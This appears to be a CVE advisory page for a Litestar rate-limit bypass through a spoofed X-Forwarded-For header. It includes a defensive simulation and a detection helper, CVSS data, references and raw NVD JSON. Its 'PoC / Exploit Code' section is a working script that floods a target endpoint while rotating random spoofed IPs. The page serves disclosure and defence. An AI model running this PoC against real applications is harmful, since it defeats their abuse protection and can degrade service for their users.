Security Vulnerability Report
CVE-2025-59152 CVSS 7.5 HIGH

CVE-2025-59152

Published: 2025-10-06 16:15:34
Last Modified: 2026-04-15 00:35:42

Description

Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In version 2.17.0, rate limits can be completely bypassed by manipulating the X-Forwarded-For header. This renders IP-based rate limiting ineffective against determined attackers. Litestar's RateLimitMiddleware uses `cache_key_from_request()` to generate cache keys for rate limiting. When an X-Forwarded-For header is present, the middleware trusts it unconditionally and uses its value as part of the client identifier. Since clients can set arbitrary X-Forwarded-For values, each different spoofed IP creates a separate rate limit bucket. An attacker can rotate through different header values to avoid hitting any single bucket's limit. This affects any Litestar application using RateLimitMiddleware with default settings, which likely includes most applications that implement rate limiting. Version 2.18.0 contains a patch for the vulnerability.
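The description above turns on one design decision: the rate-limit key is derived from a header the client controls. The example below is added here to show that mechanism and its defensive counterpart; it is not Litestar's code and does not reproduce `cache_key_from_request()`. It models a request as a TCP peer address plus lower-cased headers, uses a hypothetical trusted-proxy range (10.0.0.0/8) and constructed access-log lines, and runs both key derivations through the same toy limiter so the bucket-splitting effect can be measured offline. The detection helper at the end goes slightly beyond the advisory: it flags peers that present many distinct X-Forwarded-For values, which is the observable side effect of the rotation the description mentions.

```python
"""Added example (not Litestar's code): bucket keys derived from a
client-controlled header versus keys derived from the trusted-proxy chain."""
import ipaddress
from collections import Counter, defaultdict
from dataclasses import dataclass, field


@dataclass
class Request:
    """Minimal stand-in for an ASGI request: TCP peer address plus headers
    (header names lower-cased, as ASGI servers present them)."""
    peer_ip: str
    headers: dict = field(default_factory=dict)


# Hypothetical reverse-proxy range; a real deployment supplies its own list.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def naive_key(request: Request) -> str:
    """Models the behaviour the advisory describes: whatever the client put in
    X-Forwarded-For becomes the bucket key, so every distinct value is a new
    bucket with a fresh allowance."""
    forwarded = request.headers.get("x-forwarded-for")
    if forwarded:
        return forwarded.split(",")[0].strip()
    return request.peer_ip


def trusted_key(request: Request) -> str:
    """Honour X-Forwarded-For only when the TCP peer is a trusted proxy, and
    then use the right-most hop that is not itself a trusted proxy (the address
    our own proxy appended).  Anything else keys on the peer address."""
    peer = ipaddress.ip_address(request.peer_ip)
    if not any(peer in net for net in TRUSTED_PROXIES):
        return request.peer_ip  # direct connection: the header is attacker-controlled
    hops = [h.strip() for h in request.headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed hop: fall back to the proxy's own address
        if not any(addr in net for net in TRUSTED_PROXIES):
            return str(addr)
    return request.peer_ip


class FixedWindowLimiter:
    """Toy in-memory limiter: at most `limit` requests per key in one window."""

    def __init__(self, limit: int, key_fn):
        self.limit = limit
        self.key_fn = key_fn
        self.counts = Counter()

    def allow(self, request: Request) -> bool:
        key = self.key_fn(request)
        self.counts[key] += 1
        return self.counts[key] <= self.limit


def simulate(key_fn, n: int = 50, limit: int = 10) -> int:
    """One direct peer (203.0.113.7, TEST-NET-3) sends n requests, rotating the
    spoofed header each time; returns how many the limiter lets through."""
    limiter = FixedWindowLimiter(limit, key_fn)
    allowed = 0
    for i in range(n):
        req = Request("203.0.113.7", {"x-forwarded-for": f"198.51.100.{i}"})
        if limiter.allow(req):
            allowed += 1
    return allowed


# Constructed access-log lines: "<peer> <method> <path> <status> xff=<header>".
SAMPLE_LOG = [f"203.0.113.7 GET /api/endpoint 200 xff=198.51.100.{i}" for i in range(6)] + [
    "192.0.2.5 GET /api/endpoint 200 xff=192.0.2.5",
    "192.0.2.5 GET /api/endpoint 429 xff=192.0.2.5",
]


def spoof_suspects(log_lines, threshold: int = 5) -> dict:
    """Return peers that presented more than `threshold` distinct
    X-Forwarded-For values; a genuine client rarely changes its upstream IP."""
    seen = defaultdict(set)
    for line in log_lines:
        peer = line.split()[0]
        xff = line.rsplit("xff=", 1)[1]
        seen[peer].add(xff)
    return {peer: len(v) for peer, v in seen.items() if len(v) > threshold}


if __name__ == "__main__":
    print("header-keyed limiter let through:", simulate(naive_key))    # 50 of 50
    print("proxy-aware limiter let through:", simulate(trusted_key))  # 10 of 50
    print("peers rotating X-Forwarded-For:", spoof_suspects(SAMPLE_LOG))
```

With the header-keyed derivation every one of the 50 requests lands in its own bucket and all pass; with the proxy-aware derivation the same traffic collapses onto the peer address and stops at the limit of 10. The log check catches the same rotation after the fact, which is useful on deployments that cannot upgrade immediately.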

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

litestar == 2.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-59152 - Litestar RateLimitMiddleware Bypass PoC

This PoC demonstrates how an attacker can bypass rate limiting by rotating
X-Forwarded-For header values.
"""
import random

import requests

TARGET_URL = "http://target-litestar-app.com/api/endpoint"  # Target Litestar application endpoint
NUM_REQUESTS = 1000  # Number of requests to send (exceeding normal rate limit)


def generate_random_ip():
    """Generate a random IP address for X-Forwarded-For header spoofing."""
    return f"{random.randint(1, 223)}.{random.randint(0, 255)}.{random.randint(0, 255)}.{random.randint(1, 254)}"


def exploit_rate_limit_bypass():
    """
    Exploit the rate limit bypass vulnerability by rotating X-Forwarded-For
    header values for each request.
    """
    print(f"[*] Starting rate limit bypass exploit against {TARGET_URL}")
    print(f"[*] Sending {NUM_REQUESTS} requests with rotating X-Forwarded-For headers")
    success_count = 0
    blocked_count = 0

    for i in range(NUM_REQUESTS):
        # Rotate X-Forwarded-For header with a random IP for each request
        spoofed_ip = generate_random_ip()
        headers = {
            "X-Forwarded-For": spoofed_ip,
            "User-Agent": "Mozilla/5.0 (compatible; PoC)",
        }
        try:
            response = requests.get(TARGET_URL, headers=headers, timeout=10)
            if response.status_code == 200:
                success_count += 1
                if (i + 1) % 100 == 0:
                    print(f"[+] Request {i+1}: Success (IP: {spoofed_ip}, Status: {response.status_code})")
            elif response.status_code == 429:  # Too Many Requests
                blocked_count += 1
                print(f"[-] Request {i+1}: Rate limited (IP: {spoofed_ip})")
            else:
                print(f"[?] Request {i+1}: Status {response.status_code} (IP: {spoofed_ip})")
        except requests.exceptions.RequestException as e:
            print(f"[!] Request {i+1}: Error - {e}")

    print("\n[*] Results:")
    print(f"    Successful requests: {success_count}")
    print(f"    Blocked requests: {blocked_count}")
    print(f"    Bypass rate: {success_count / NUM_REQUESTS * 100:.1f}%")
    if success_count > blocked_count:
        print("[!] VULNERABLE: Rate limiting has been bypassed!")
    else:
        print("[*] Rate limiting appears to be effective.")


if __name__ == "__main__":
    exploit_rate_limit_bypass()
```

References

https://github.com/litestar-org/litestar/blob/26f20ac6c52de2b4bf81161f7560c8bb4af6f382/litestar/middleware/rate_limit.py#L127
https://github.com/litestar-org/litestar/commit/42a89e043e50b515f8548a93954fe143f63cf9fb
https://github.com/litestar-org/litestar/security/advisories/GHSA-hm36-ffrh-c77c

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-59152", "sourceIdentifier": "[email protected]", "published": "2025-10-06T16:15:34.193", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. In version 2.17.0, rate limits can be completely bypassed by manipulating the X-Forwarded-For header. This renders IP-based rate limiting ineffective against determined attackers. Litestar's RateLimitMiddleware uses `cache_key_from_request()` to generate cache keys for rate limiting. When an X-Forwarded-For header is present, the middleware trusts it unconditionally and uses its value as part of the client identifier. Since clients can set arbitrary X-Forwarded-For values, each different spoofed IP creates a separate rate limit bucket. An attacker can rotate through different header values to avoid hitting any single bucket's limit. This affects any Litestar application using RateLimitMiddleware with default settings, which likely includes most applications that implement rate limiting. Version 2.18.0 contains a patch for the vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-807"}]}], "references": [{"url": "https://github.com/litestar-org/litestar/blob/26f20ac6c52de2b4bf81161f7560c8bb4af6f382/litestar/middleware/rate_limit.py#L127", "source": "[email protected]"}, {"url": "https://github.com/litestar-org/litestar/commit/42a89e043e50b515f8548a93954fe143f63cf9fb", "source": "[email protected]"}, {"url": "https://github.com/litestar-org/litestar/security/advisories/GHSA-hm36-ffrh-c77c", "source": "[email protected]"}]}}
```